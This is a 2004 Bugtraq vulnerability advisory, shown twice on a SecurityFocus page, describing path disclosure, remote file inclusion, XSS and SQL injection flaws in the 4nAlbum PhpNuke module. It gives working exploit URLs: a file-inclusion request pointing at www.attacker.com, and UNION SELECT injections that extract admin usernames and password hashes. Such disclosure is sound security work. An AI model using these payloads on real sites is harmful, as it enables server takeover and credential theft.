Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
[waraxe-2004-SA#006 - Multiple vulnerabilities in 4nalbum module for PhpNuke]
Mar 15 2004 06:40PM
Janek Vind (come2waraxe yahoo com)
{=======================================================================
=========}
{ [waraxe-2004-SA#006] }
{=======================================================================
=========}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's infofile:
4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed (at) 4thDimension (dot) de [email concealed]) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking
With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.
- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
If we use URL-s below, then we can see standard php error messages with full path disclosure.
This is frequently underestimated security flaw, which can give for potential attacker vital
information, needed to hack further. For example, if we can exploit some sql injection bugs and
logged-in MySql user has file permissions, then the exact full path to the file is needed to successful
file creation or reading.
Examples:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
2. Remote file inclusion:
Remote attacker can make GET or POST request with specially crafted parameter and victim server
will include the file from remote server, therefore attacker can make victim server parse any php code,
whatever attacker wants. Of course - if webserver is located behind properly configured firewall, or if
php.ini configuration contains "allow_url_fopen = Off", then it does'nt work...
Examples:
First upload file named "fileFunctions.php" to te www.attacker.com. Then make request:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basep
ath=http://www.attacker.com/
This is the original code from displaycategory.php:
...
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
function getThumbnail($img, $galloc) {
global
...
3. Cross-Site scripting aka XSS
XSS is useful for stealing of the cookies, which will lead to bypassing of the authentication and
overtaking of the website (if attacker can get admin-s cookies).
Example:
http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]
Because PhpNuke will filter some important symbols from GET request, POST request is needed.
4. sql injection
This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&d
o=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20F
ROM%20nuke_authors/*
and this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&d
o=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20F
ROM%20nuke_authors/*
and you will see admin's password md5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
{=======================================================================
=========}
{ [waraxe-2004-SA#006] }
{=======================================================================
=========}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's infofile:
4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed (at) 4thDimension (dot) de [email concealed]) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking
With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.
- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
If we use URL-s below, then we can see standard php error messages with full path disclosure.
This is frequently underestimated security flaw, which can give for potential attacker vital
information, needed to hack further. For example, if we can exploit some sql injection bugs and
logged-in MySql user has file permissions, then the exact full path to the file is needed to successful
file creation or reading.
Examples:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
2. Remote file inclusion:
Remote attacker can make GET or POST request with specially crafted parameter and victim server
will include the file from remote server, therefore attacker can make victim server parse any php code,
whatever attacker wants. Of course - if webserver is located behind properly configured firewall, or if
php.ini configuration contains "allow_url_fopen = Off", then it does'nt work...
Examples:
First upload file named "fileFunctions.php" to te www.attacker.com. Then make request:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basep
ath=http://www.attacker.com/
This is the original code from displaycategory.php:
...
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
function getThumbnail($img, $galloc) {
global
...
3. Cross-Site scripting aka XSS
XSS is useful for stealing of the cookies, which will lead to bypassing of the authentication and
overtaking of the website (if attacker can get admin-s cookies).
Example:
http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]
Because PhpNuke will filter some important symbols from GET request, POST request is needed.
4. sql injection
This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&d
o=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20F
ROM%20nuke_authors/*
and this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&d
o=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20F
ROM%20nuke_authors/*
and you will see admin's password md5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
[ reply ]